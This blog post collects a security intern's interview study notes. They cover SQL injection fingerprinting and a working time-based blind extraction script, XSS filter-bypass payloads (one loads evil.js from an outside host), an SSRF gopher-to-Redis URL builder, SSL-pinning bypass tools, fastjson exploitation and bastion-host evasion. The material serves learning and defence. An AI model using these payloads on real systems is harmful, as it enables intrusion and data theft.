[Interview] Notes and summary from an Anheng interview


I forgot to record yesterday's interview, so I am sorting out my weaker knowledge points while I still remember some of it. Many of the answers were fairly colloquial, and I did not have time to memorize the interview questions, emm; every stumble makes you a little wiser...

SQL injection

SQL injection types:

Boolean-based blind SQL injection
Error-based SQL injection
UNION query SQL injection
Stacked queries SQL injection (several statements in one request)
Time-based blind SQL injection

What is the principle of SQL injection?

The root cause of SQL injection is that the code does not validate or escape user input and splices it directly into the query string. Through such a flaw an attacker inserts SQL of their own into the application's query, and the database server parses and executes it with the application's privileges.

How do you determine the target's database type through SQL injection?

I really could not answer this one; the following is an answer collected from the Internet.
1. Database-specific string concatenation

id=1 and '1'+'1'='11'          # MSSQL ('+' concatenates strings; in MySQL '+' is numeric addition, so this is false there)
id=1 and concat('1','1')='11'  # MySQL or Oracle (also SQL Server 2012 and later)
id=1 and '1'||'1'='11'         # Oracle (also PostgreSQL); in MySQL '||' is logical OR unless PIPES_AS_CONCAT is enabled

MySQL and Oracle provide the concat() function, MSSQL concatenates strings with the '+' operator, and Oracle (like PostgreSQL) uses '||'. Inject each of these conditions in turn and note which one leaves the page's normal ("true") response intact; that tells you which dialect is running.

2. Database-specific metadata tables

id=1 and (select count(*) from sys.user_tables)>0 and 1=1            # Oracle
id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1  # MySQL 5.0 and above
id=1 and (select count(*) from sysobjects)>0 and 1=1                 # MSSQL
id=1 and (select count(*) from msysobjects)>0 and 1=1                # Access

Each database ships its own metadata tables or objects: Oracle has sys.user_tables, MySQL (5.0+) information_schema.TABLES, MSSQL sysobjects and Access msysobjects. The condition is true whenever the table exists, and the query fails (or the page changes) when it does not, so injecting each in turn and watching the response reveals the backend. Note that information_schema also exists in MSSQL and PostgreSQL, so combine this with the other checks.
3. Database-specific functions
len() and length()
len(): SQL Server returns string length with len().
length(): MySQL, Oracle, PostgreSQL, DB2 and Informix use length() (MySQL also has char_length()).

version() and @@version
version(): MySQL and PostgreSQL return version information with this function.
@@version: MySQL and SQL Server both expose this system variable.

substring() and substr()
MySQL accepts both substring() and substr().
Oracle only has substr().
SQL Server only has substring().
4. Comment characters and statement separators
/* */ is a block comment in MySQL, but Oracle, SQL Server and PostgreSQL accept it too, so it does not discriminate much.
-- is a line comment supported by Oracle and SQL Server; MySQL requires a space after the two dashes (in a URL this is usually written as --+).
# is a line comment only in MySQL; if it causes an error, the backend is probably not MySQL.
; separates stacked statements. Oracle's drivers do not accept several statements in one query, so an error on ; hints at Oracle; whether stacking works at all also depends on the driver and API in use, not only on the database.


5. Time-delay functions specific to each database (for blind injection)

MySQL

BENCHMARK(1000000,MD5('QWE'))   (the older BENCHMARK(1000000,ENCODE('QWE','ASD')) form fails on MySQL 8.0, where ENCODE() was removed)
SLEEP(5)

PostgreSQL

PG_SLEEP(5)
GENERATE_SERIES(1,1000000)

SQL Server

WAITFOR DELAY '0:0:5'

Oracle

DBMS_PIPE.RECEIVE_MESSAGE('a',5)

6. Judging from the error message
Append a single quotation mark to the injection point and read the server's error. A message such as Microsoft JET Database Engine error '80040e14' means the application reaches the database through the JET engine, i.e. an Access database; an error mentioning the ODBC SQL Server Driver points to MSSQL. Other backends are just as talkative: "You have an error in your SQL syntax" comes from MySQL, "ORA-" prefixed messages from Oracle, and "unterminated quoted string" from PostgreSQL.

Other ways to determine the database type

1. Guess from the development language (a heuristic only, to be confirmed with the probes above)

asp: SQL Server, Access
.net: SQL Server
php: MySQL, PostgreSQL
java: Oracle, MySQL

2. Open ports
Relational databases:
Oracle listens on 1521 by default;
MySQL on 3306;
SQL Server on 1433;
PostgreSQL on 5432.

NoSQL databases:
MongoDB on 27017;
Redis on 6379;
memcached on 11211.

Time-based blind injection functions

I think I just said sleep(), emmm
1. Principle
The SQL statement is spliced together on the server side, but the page returns the same response whether the injected condition is true or false, and error messages are suppressed, so neither boolean nor error-based injection gives a signal. The only channel left is time: the injected condition calls a delay function (MySQL sleep(), benchmark()) when it is true, and the attacker reads the data bit by bit from the response time. Because the delay runs inside the database, firing sleep() or benchmark() many thousands of times puts real load on the server, so keep each delay short and the number of probes small (binary search per character rather than a linear scan).
2. benchmark() is the fallback when sleep() is filtered: BENCHMARK(count, expr) evaluates expr count times, so the delay comes from CPU work rather than a timer and its length varies with server load.
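The bit-by-bit extraction described above, written out as an added example (not code from the original post). The target is a stand-in built on sqlite3 with a SLEEP() function registered so that the injected condition costs time exactly as MySQL's SLEEP() would; the users table, the admin row and its password are constructed test data. Against a real MySQL backend the two probe functions would be ascii(substring(...)) and length(), with the same binary search.

```python
"""Time-based blind SQL injection: recover a string purely from response time.

Added example, not from the original post. sqlite3 with a registered SLEEP()
stands in for the vulnerable MySQL application; all data is constructed.
"""
import sqlite3
import time

DELAY = 0.08  # seconds the injected SLEEP() costs when the condition is true


def make_target():
    """Build the simulated application: an in-memory DB and a vulnerable query."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'Pa55w0rd')")  # constructed secret
    conn.commit()

    def vulnerable_request(user_input):
        # The injection point: the parameter is spliced into the SQL verbatim.
        sql = "SELECT username FROM users WHERE id = " + user_input
        conn.execute(sql).fetchall()
        return "ok"  # identical page for true and false: no boolean or error echo

    return vulnerable_request


def timing_oracle(request, condition):
    """True when the SQL `condition` holds, judged only by how long the request took."""
    payload = (f"1 AND (SELECT CASE WHEN ({condition}) "
               f"THEN SLEEP({DELAY}) ELSE 0 END)")
    start = time.perf_counter()
    request(payload)
    return time.perf_counter() - start >= DELAY / 2  # threshold: half the delay


def extract_length(request, expr, max_len=64):
    """Binary-search the length of a string expression (about log2(max_len) probes)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if timing_oracle(request, f"length(({expr})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(request, expr):
    """Recover the string character by character, binary searching each code point."""
    length = extract_length(request, expr)
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127  # ASCII range; 7 probes per character instead of up to 127
        while lo < hi:
            mid = (lo + hi) // 2
            if timing_oracle(request, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    req = make_target()
    print(extract_string(req, "SELECT password FROM users WHERE username = 'admin'"))
```

The threshold of half the delay is what keeps the oracle honest: a baseline request takes microseconds, a true branch at least DELAY, so anything in between is network jitter and should make you raise DELAY rather than trust the bit. The binary search is also the answer to the load concern above: eight characters cost about 60 probes instead of several hundred.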

XPath injection

1. Principle
XPath injection is a web application attack similar to SQL injection. The attacker abuses the expressiveness of the XPath language by sending malicious payloads to the application in order to read data or perform actions they are not authorized for.
The injection points are form fields, URL parameters and HTTP headers whose values end up inside an XPath expression that selects nodes or attributes of an XML document. If the application does not sanitize that input, the attacker can change the structure of the query and pull sensitive data out of the XML document.
A typical login check looks like //user[username/text()='USER' and password/text()='PASS']. Supplying ' or '1'='1 as both the user name and the password turns it into
//user[username/text()='' or '1'='1' and password/text()='' or '1'='1']
Because and binds tighter than or in XPath, this evaluates to false or (true and false) or true, i.e. always true, so the query returns a user node and the attacker is logged in. Once in, blind XPath injection (asking yes/no questions about the document with functions such as string-length() and substring()) can recover the highest-privileged account and other data in the file. Note that what Chinese write-ups call "XPath error injection via updatexml()" is a MySQL SQL injection technique rather than XPath injection: updatexml()'s second argument is an XPath expression, and the "XPATH syntax error" message it raises echoes the injected data.

What do you do when HTTP/HTTPS traffic cannot be captured?

What else can I do? I usually just give up on this kind of mini-program or app with protection! The purpose of the question should be to get me to describe the bypass method.

Wouldn't it be as simple as exporting the SSL certificate? I forgot to mention this.
The following is the packet capture method I found.

App without its own pinned certificate

Many apps do not pin a certificate and simply trust whatever CA store the device trusts, exactly as the browser does. These can be intercepted by installing Burp's CA certificate on the Android emulator and pointing the device's proxy at Burp. Caveat: since Android 7 (API 24) apps no longer trust user-installed CAs by default, so the Burp CA must be pushed into the system store (rooted device or emulator with a writable system image), or the app must ship a network_security_config.xml that trusts user certificates.

App with its own certificate: certificate pinning (SSL pinning)

SSL pinning is a security mechanism that makes a mobile app accept a TLS connection to a given server only if the server's certificate or public key matches one baked into the app at build time. The app stores the expected certificate or public-key fingerprint and compares it with what the server presents during the handshake; a mismatch aborts the connection. This defeats man-in-the-middle interception even when the attacker controls a CA that the device trusts.

In Chinese write-ups pinning is often called "one-way authentication": only the client checks the server's identity, and it checks it against a certificate the developer bought (or self-signed) and shipped inside the app rather than against the device's public CA list.

Burp only proxies what completes a TLS handshake. With a pinned app the handshake fails as soon as the app sees Burp's forged certificate instead of the pinned one, so the request never becomes an HTTP message in Burp: you see nothing at all, or only a TLS alert in the event log, and the capture "fails".

Bypass methods:
1. Find the certificate material inside the app and give it to the interception proxy. This only helps when the app authenticates itself to the server with a client certificate (mutual TLS): extract the client certificate and private key from the APK and import them into Burp so that Burp can complete the handshake. Extracting them requires reversing the app, which is hard.
2. Remove or neutralize the pinning code in the app so that it falls back to the system trust store, after which it will happily talk to the proxy. This is normally done by hooking at runtime rather than patching the APK, much like setting a breakpoint and overriding the result of the check.
Both assume the Burp CA certificate is already installed and the device's proxy (or a VPN-based proxy) is configured.

Two hooking tools are commonly used:
1. JustTrustMe in the Xposed framework
JustTrustMe hooks the usual certificate-checking APIs (TrustManager implementations, OkHttp's CertificatePinner and friends) so that every pinning check in the app passes.
2. objection, built on Frida, disables pinning with the command android sslpinning disable, which patches the same checks at runtime.

What logic vulnerabilities are there?

Authentication vulnerabilities

Brute-force vulnerability
Mitigation: count failed logins per user name and, above a threshold, lock the account for a period or require a CAPTCHA.
The lockout must not be permanent, otherwise an attacker can use it to lock legitimate users out of their accounts.
Session fixation attack
Cookie spoofing
Vulnerability introduction: by forging cookie contents an attacker can log in as another user.
Vulnerability principle: for convenience the developer stores identity or login state in the cookie in plaintext, or merely encoded or hashed, and the site authorizes or authenticates the user purely from what it receives in the cookie.
Changing a field such as isLogin to 1 is then enough to be treated as logged in.
Fix: cookies must not carry readable identity or login state. Store only a random session identifier of sufficient length and look the state up on the server, so there is nothing for the client to tamper with.
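The forgeable cookie and its fix, side by side, as an added example (not code from the original post). The vulnerable function models the isLogin=1 cookie described above; the in-process dict stands in for a Redis or database session store, and the user names are constructed test data.

```python
"""Forgeable login cookie versus an opaque server-side session.

Added example, not from the original post. The session store is a dict standing
in for Redis or a database; all user names here are constructed test data.
"""
import secrets
import time

SESSION_TTL = 3600  # seconds a session stays valid
_sessions = {}      # token -> (username, expiry); a real app uses Redis or a DB


def parse_cookie(header):
    """Split 'a=1; b=2' into a dict (minimal Cookie header parser)."""
    fields = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            fields[name] = value
    return fields


# --- vulnerable: the client tells the server who it is and that it is logged in
def vulnerable_current_user(header):
    """Trusts plaintext cookie fields; anyone can set isLogin=1 in the browser."""
    fields = parse_cookie(header)
    if fields.get("isLogin") == "1":
        return fields.get("user")
    return None


# --- hardened: the cookie carries only a random identifier, state lives server-side
def login(username):
    """Issue a fresh, unguessable token after the password has been verified."""
    token = secrets.token_urlsafe(32)  # 256 bits of randomness, not derivable by the client
    _sessions[token] = (username, time.time() + SESSION_TTL)
    return f"session={token}"


def current_user(header):
    """Resolve the token server-side; a modified or unknown token maps to nobody."""
    token = parse_cookie(header).get("session")
    entry = _sessions.get(token)
    if entry is None:
        return None
    username, expiry = entry
    if time.time() > expiry:
        _sessions.pop(token, None)
        return None
    return username


def logout(header):
    """Invalidate the token on the server; deleting the browser cookie alone is not enough."""
    _sessions.pop(parse_cookie(header).get("session"), None)
```

The point of the hardened half is that the cookie value means nothing without the server's table: flipping a character, or inventing a cookie with user=admin, yields no session rather than a different user. Set the cookie with HttpOnly and Secure as well, and issue a new token on login to close the session fixation hole listed above.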

Authorization logic vulnerabilities

Horizontal privilege escalation (reaching another user's data at the same privilege level)
Vertical privilege escalation (reaching higher-privileged functions)
Unauthenticated access

Graphic CAPTCHA vulnerabilities
Password-retrieval logic vulnerabilities
Business data tampering (prices, quantities and similar values sent by the client)
Execution-sequence logic vulnerabilities (skipping or reordering steps)

Other types of logic vulnerabilities

Race condition vulnerabilities
Packet replay vulnerabilities

XSS bypass methods

Common injection points and their bypasses

Script tags
Bypassing a filter that removes the tag once (after the inner <script> is stripped, the outer pieces reassemble into a valid tag):

<scr<script>ipt>alert("XSS")</scr<script>ipt>

The script tag can be used either to define an inline script or to load a script from elsewhere.
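What that nested payload does to a single-pass removal filter, as an added example (not code from the original post): the naive and recursive filters are stand-ins for the kind of blacklist the post describes, and the hardened version uses output encoding instead.

```python
"""Why stripping '<script>' once is not a fix, and what to do instead.

Added example, not from the original post. The two filters model a typical
blacklist; html.escape is the standard-library output encoding.
"""
import html
import re

# The nested payload from the post above (constructed test input).
NESTED_PAYLOAD = '<scr<script>ipt>alert("XSS")</scr<script>ipt>'


def naive_filter(value):
    """Removes every <script> / </script> tag in one pass (case-insensitive)."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)


def recursive_filter(value):
    """Re-applies the removal until nothing changes. Still only a blacklist."""
    while True:
        stripped = naive_filter(value)
        if stripped == value:
            return value
        value = stripped


def safe_render(value):
    """Output encoding: the browser shows the text and never parses it as markup."""
    return html.escape(value, quote=True)
```

naive_filter turns the nested payload into a clean <script>alert("XSS")</script>, which is exactly what the filter was meant to stop. Looping until a fixed point closes that hole but not the event-handler and attribute payloads in the next sections, because a blacklist only knows the tags it was told about; encoding < > " ' & at output time is context-independent and is the fix to reach for.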
JavaScript events
Event handlers can be attached to elements like this:

<div onclick="alert('xss')">

Most event handlers are removed by the filter, but a few usually slip through:

<div onmouseenter="alert('xss')">   (fires when the user moves the mouse over the div)

Another workaround is to insert a space between the attribute name and the =, which breaks naive rules that look for the exact string onclick=:

<div onclick ="alert('xss')">

Inline style
Using character encoding (the wide-byte trick)

%c1;alert(/xss/);//

%c1 is the lead byte of a multibyte character in GBK-style encodings, so the byte the filter inserts after it (typically an escaping backslash) is swallowed as the trail byte and no longer protects what follows.

Bypassing length restrictions
Split the payload across several short injection points so that an HTML comment joins them into one:

"onclick=alert(1)//
"><!--
--><script>alert('xss');</script>

Filtering of spaces
Strategy: replace the space with a comment (/**/) or with a slash (/):

e.g. <img/src/onerror=alert(1)>

Rule detection and bypass

WAF rule detection
Send harmless payloads first and observe the response to learn whether the application HTML-encodes output, strips tags, or removes < and >. If closing tags are filtered, try payloads without a closing tag (<b, <i, <marquee) and watch what comes back; then try the following payloads:

<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm      (1);</script>   (JavaScript allows whitespace before the parenthesis, which defeats rules that match confirm( literally)
<script src="http://rhainfosec.com/evil.js"></script>

Mixed-case tag names (e.g. <ScRiPt>) for filters that match case-sensitively.

Which protocols are useful in SSRF?

http://: probe whether intranet hosts are alive and which ports are open (from response content, status and timing)
gopher://: send an arbitrary TCP payload, so GET or POST requests can be forged and intranet services such as FastCGI and Redis attacked
dict://: fingerprint software versions on a port, check which ports are open, and send single-line commands to services such as an internal Redis
file://: read local files
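How a gopher:// URL carries a Redis conversation through an SSRF, as an added example (not code from the original post). The host, port and command list are assumptions; the commands used are read-only (PING, INFO) so the block can be run against a test instance without side effects.

```python
"""Build a gopher:// URL that delivers raw Redis commands through an SSRF.

Added example, not from the original post. Host, port and commands are
assumptions; only harmless read-only commands are used here.
"""
from urllib.parse import quote, unquote


def encode_resp(args):
    """Encode one Redis command in RESP, the multi-bulk wire format redis-server expects."""
    out = f"*{len(args)}\r\n"
    for arg in args:
        out += f"${len(arg.encode())}\r\n{arg}\r\n"  # length is in bytes, not characters
    return out


def build_gopher_url(host, port, commands):
    """gopher://host:port/_<payload>: the '_' is a dummy gopher item type the client
    strips, and every byte after it is percent-encoded so CR/LF survive URL parsing."""
    payload = "".join(encode_resp(cmd) for cmd in commands)
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


def gopher_payload_bytes(url):
    """Recover the bytes a gopher client would write to the socket (for inspection)."""
    _, _, rest = url.partition("/_")
    return unquote(rest).encode()


if __name__ == "__main__":
    url = build_gopher_url("127.0.0.1", 6379, [["PING"], ["INFO", "server"]])
    print(url)
    print(gopher_payload_bytes(url))
```

The percent-encoding is the whole trick: the SSRF sink only sees a URL, but the gopher client decodes it and writes the raw bytes, CRLFs included, to port 6379, where Redis reads them as a pipeline of commands. The same builder sends a FastCGI record or an SMTP dialogue if you swap encode_resp for that protocol's framing.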

Do you understand XXE?

Principle: the application parses XML supplied by the user with external entities enabled, so a DTD in the input can declare an entity whose value is fetched from a file or URL and expanded into the document.
Uses: scanning intranet ports, reading files through the file:// protocol, and attacking intranet web applications that can be exploited with a GET request (e.g. Struts2).

Harm:
1. Loading malicious external files
2. Local file disclosure
3. Intranet port scanning
4. Attacks on intranet websites
5. Denial of service (e.g. exponential entity expansion, the "billion laughs" attack)

Defense: do not accept DTDs or external entities in user-supplied XML. In PHP, libxml_disable_entity_loader(true) disables external entity loading; note that the function is deprecated as of PHP 8.0 because libxml 2.9.0 and later disable external entity loading by default, so the real checks are the libxml version and that no code re-enables it by passing LIBXML_NOENT to the parser.

Bastion host bypass in domain penetration

Regarding bastion hosts, I reproduced a JumpServer RCE earlier:
https://blog.csdn.net/weixin_53009585/article/details/129001750
Bastion host: an operations and maintenance audit system that sits between administrators and servers and records their sessions

Bypassing the ACL policy

When there is no ACL on the firewall or switch in front of the server zone, or the ACL is not fine-grained enough, a PC in the user zone can reach the remote servers directly, bypassing the bastion host altogether.

Bypassing by pivoting through the bastion host

In the other scenario the user reaches server A through the bastion host as intended, then opens a connection from A to server B. The hop from A to B is never audited, so B is reached while bypassing the bastion host.

Other bypass scenarios

1. The target server's remote-management port is restricted by the ACL but other ports are not, so the simplest way around is port forwarding through an allowed port.
2. If the server can reach the internet, a remote-control tool such as Sunflower (向日葵), ToDesk or TeamViewer can be used directly, which bypasses the bastion host's auditing entirely.
Such remote tools should be blocked at the server network segment; the details are not covered here.

Fastjson

I didn't learn much here.

fastjson deserialization vulnerability

A normal request is a GET with no body; sending a deliberately malformed POST body and looking for a fastjson string or stack trace in the response reveals that fastjson is in use. Exploitation principle: the attacker sends a malicious JSON payload in the request body. When fastjson parses the JSON object it does not filter the @type field, so the attacker can name an arbitrary class to instantiate, such as com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl. That class has a _bytecodes field, and some of its methods (reached through getters fastjson calls during deserialization) build a Java class from _bytecodes, so the attacker passes a class in through a field and has its constructor or static initializer executed when the class is instantiated. (The TemplatesImpl chain needs Feature.SupportNonPublicField enabled because _bytecodes is private; other gadgets such as JdbcRowSetImpl work through JNDI instead.)
What to do when there is no echo?
1. Write the command output into a static resource file (an .html or .js file under the web root) and read it back over HTTP
2. Exfiltrate the data through DNS (dnslog); if the host cannot resolve external names this gives nothing and cannot be verified
3. Have the payload write the command output directly into the HTTP response of the request that carried the PoC

Do you know about Spring vulnerabilities?

I still don't know much here, so it was embarrassing to be asked.
CVE-2010-1622 Spring Framework class.classLoader Class Remote Code Execution
CVE-2013-4152 XML External Entity (XXE) Injection in Spring Framework
CVE-2014-3527 Spring Security Authentication Bypass Vulnerability
CVE-2014-3578 Spring Framework Directory Traversal Vulnerability
CVE-2016-6652 Spring Data JPA SQL blind injection
CVE-2018-1271 Spring MVC directory traversal vulnerability
CVE-2020-5405 Spring Cloud Config path traversal caused information leakage
...
With so many, I would answer with a sensitive information disclosure.

Golden ticket vs. silver ticket

I only just learned about this; I will study it today.

Domain fronting

I haven't learned this yet, emmm.

Summary

The interview as a whole revolved around the content of the resume. Because it was an internship position the questions were relatively shallow, but the scope was still quite wide. Testing your current state of learning through an interview like this is well worth it.

reference:

https://www.cnblogs.com/Fluorescence-tjy/p/10400588.html
https://www.freebuf.com/articles/endpoint/359208.html
https://cloud.tencent.com/developer/article/1906218
https://blog.csdn.net/m0_38103658/article/details/105481323


Origin blog.csdn.net/weixin_53009585/article/details/129996499